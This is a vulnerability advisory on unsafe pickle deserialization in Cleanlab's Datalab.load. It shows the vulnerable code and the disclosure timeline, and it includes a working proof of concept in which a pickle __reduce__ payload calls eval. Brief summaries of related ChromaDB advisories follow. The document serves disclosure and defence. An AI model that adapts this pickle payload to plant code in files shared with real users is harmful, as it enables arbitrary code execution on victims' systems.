SAI Security Advisory

Unsafe deserialization in Datalab leads to arbitrary code execution

September 12, 2024

Products Impacted

This vulnerability exists in versions  v2.4.0 or newer of Cleanlab.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data

Details

To exploit this vulnerability, an attacker would create a directory and place a malicious file called datalabs.pkl in that directory before sending the directory to a victim user. When the victim user loads the directory with Datalabs.load, the vulnerable code is called. The vulnerability exists in the deserialize function of the _Serializer class in the cleanlab/datalab/internal/serialize.py file (shown below).

   @classmethod
    def deserialize(cls, path: str, data: Optional[Dataset] = None) -> Datalab:
        """Deserializes the datalab object from disk."""

        if not os.path.exists(path):
            raise ValueError(f"No folder found at specified path: {path}")

        with open(os.path.join(path, OBJECT_FILENAME), "rb") as f:
            datalab: Datalab = pickle.load(f)

        cls._validate_version(datalab)

        # Load the issues from disk.
        issues_path = os.path.join(path, ISSUES_FILENAME)
        if not hasattr(datalab.data_issues, "issues") and os.path.exists(issues_path):
            datalab.data_issues.issues = pd.read_csv(issues_path)

        issue_summary_path = os.path.join(path, ISSUE_SUMMARY_FILENAME)
        if not hasattr(datalab.data_issues, "issue_summary") and os.path.exists(issue_summary_path):
            datalab.data_issues.issue_summary = pd.read_csv(issue_summary_path)

        if data is not None:
            if hash(data) != hash(datalab._data):
                raise ValueError(
                    "Data has been modified since Lab was saved. "
                    "Cannot load Lab with modified data."
                )

            if len(data) != len(datalab.labels):
                raise ValueError(
                    f"Length of data ({len(data)}) does not match length of labels ({len(datalab.labels)})"
                )

            datalab._data = Data(data, datalab.task, datalab.label_name)
            datalab.data = datalab._data._data

        return datalab

The above code is called by the Datalab.load function shown below.

@staticmethod
    def load(path: str, data: Optional[Dataset] = None) -> "Datalab":
        """Loads Datalab object from a previously saved folder.

        Parameters
        ----------
        `path` :
            Path to the folder previously specified in ``Datalab.save()``.

        `data` :
            The dataset used to originally construct the Datalab.
            Remember the dataset is not saved as part of the Datalab,
            you must save/load the data separately.

        Returns
        -------
        `datalab` :
            A Datalab object that is identical to the one originally saved.
        """
        datalab = _Serializer.deserialize(path=path, data=data)
        load_message = f"Datalab loaded from folder: {path}"
        print(load_message)
        return datalab

When the user loads the directory with the maliciously crafted pickle file the code shown above will instantiate the _Serializer class and call the deserialize function which then searches for the datalab.pkl file before running pickle.load on the file. An example attack can be seen below, where first we create our exploit directory with the malicious pickle file.

import pickle

class Exploit:
    def __reduce__(self):
        return (eval, ("print('pwned')",))
    
open("./exploit/datalab.pkl", "wb").write(pickle.dumps(Exploit()))

Once the file has been created, the vulnerability can be exploited by having the user load the malicious directory:

from cleanlab import Datalab

Datalab.load("./exploit")

Once the user runs this, the arbitrary code will be executed on the system.

Timeline

July, 11 2024 — Vendor disclosure via process outlined in security page

September 6, 2024 — Followed up with vendor letting them know we plan to publish on September 12, 2024

September 12, 2024 — Public disclosure

Project URL

https://cleanlab.ai/

https://github.com/cleanlab/cleanlab

Researcher: Kasimir Schulz, Principal Security Researcher, HiddenLayer

Related SAI Security Advisory

CVE-2026-45833

June 12, 2026

Post-Authentication RCE via update_collection

ChromaDB

Any authenticated user with UPDATE_COLLECTION permission can achieve remote code execution by updating a collection's embedding function to reference a malicious HuggingFace model with trust_remote_code: true. The update_collection endpoint uses the same build_from_config() code path as CVE-2026-45829. Authentication runs before model loading, so this is not a pre-authentication issue, but the model instantiation itself is unguarded.

June 2026
CVE-2026-45832

June 12, 2026

V1 API Tenant Isolation Bypass via Null Tenant/Database Context

ChromaDB

All V1 collection-level endpoints pass None for tenant and database to the authorization layer, making tenant-scoped access control impossible through V1, regardless of which authorization provider is configured. V1 cannot be disabled. Combined with CVE-2026-45830, any authenticated user has unrestricted read/write access to any collection by UUID through V1 endpoints.

June 2026